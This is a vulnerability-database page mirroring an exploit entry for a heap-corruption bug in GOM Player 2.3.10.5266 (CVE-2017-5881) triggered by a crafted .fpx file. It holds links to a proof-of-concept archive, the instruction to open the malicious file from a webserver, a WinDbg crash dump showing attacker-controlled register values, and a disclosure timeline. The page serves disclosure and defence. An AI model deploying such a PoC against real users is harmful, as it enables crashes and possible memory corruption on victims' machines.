Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtPeter Baris1337DAY-ID-27021
HistoryFeb 16, 2017 - 12:00 a.m.

GOM Player 2.3.10.5266 - .fpx Denial of Service Exploit

2017-02-1600:00:00
Peter Baris
0day.today
39

EPSS

0.003

Percentile

69.7%

JSON

Exploit for windows platform in category dos / poc

# Exploit Title: GOM Player 2.3.10.5266 - Remote heap corruption (.fpx)
# Date: 2017-02-15
# Exploit Author: Peter Baris
# Exploit link: http://www.saptech-erp.com.au/resources/PoC.zip
# Software Link: http://player.gomlab.com/download.gom?language=eng
# CVE: CVE-2017-5881
# Version: 2.3.10.5266
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64
 
POC:
 
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41367.zip  
 
Open the malicious fpx file with CTRL+U, served by a webserver:
 
 WinDbg 
 
(864.150): Access violation - code c0000005 (first chance)
 
First chance exceptions are reported before any exception handling.
 
This exception may be expected and handled.
 
eax=092fcde8 ebx=00000000 ecx=41414141 edx=090ff798 esi=090ff790
edi=05b10000
 
eip=77902fe5 esp=10a9fbb4 ebp=10a9fc94 iopl=0         nv up ei ng nz na pe
cy
 
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010287
 
ntdll!RtlpFreeHeap+0x4d6:
 
77902fe5 8b19            mov     ebx,dword ptr [ecx]
ds:002b:41414141=????????
 
  
 
0:022> !exchain
 
10a9fc84: ntdll!_except_handler4+0 (77946325)
 
  CRT scope  0, func:   ntdll!RtlpFreeHeap+b7d (7795b52d)
 
10a9fd54: *** WARNING: Unable to verify checksum for C:\Program Files
(x86)\GRETECH\GomPlayer\gvf.ax
 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
C:\Program Files (x86)\GRETECH\GomPlayer\gvf.ax - 
 
gvf!DllGetClassObject+5801b (6e02bc7b)
 
10a9fdcc: gvf!DllGetClassObject+57af8 (6e02b758)
 
10a9fe00: gvf!DllGetClassObject+57ac8 (6e02b728)
 
10a9fe84: gvf!DllGetClassObject+57fe0 (6e02bc40)
 
10a9feac: gvf!DllGetClassObject+5d5e8 (6e031248)
 
10a9ff60: ntdll!_except_handler4+0 (77946325)
 
  CRT scope  0, filter: ntdll!__RtlUserThreadStart+2e (77946608)
 
                func:   ntdll!__RtlUserThreadStart+63 (77948227)
 
10a9ff80: ntdll!FinalExceptionHandler+0 (779983b1)
 
Invalid exception stack at ffffffff
 
 
2017-02-04 notification sent to developers
 
2017-02-05 developerss requested information about the issue
 
2017-02-09 information sent with the PoC
 
no reply if they plan to release a fix or not

#  0day.today [2018-01-08]  #

Related

exploitpack 1
prion 1
cvelist 1
nvd 1
exploitdb 1
cve 1
exploitpack
exploitpack
GOM Player 2.3.10.5266 - .fpx Denial of Service
2017-02-15 00:00:00
prion
prion
Memory corruption
2017-02-21 07:59:00
cvelist
cvelist
CVE-2017-5881
2017-02-21 07:46:00
nvd
nvd
CVE-2017-5881
2017-02-21 07:59:00
exploitdb
exploitdb
GOM Player 2.3.10.5266 - '.fpx' Denial of Service
2017-02-15 00:00:00
cve
cve
CVE-2017-5881
2017-02-21 07:59:00

EPSS

0.003

Percentile

69.7%

JSON
Related for 1337DAY-ID-27021
exploitpack1prion1cvelist1nvd1exploitdb1cve1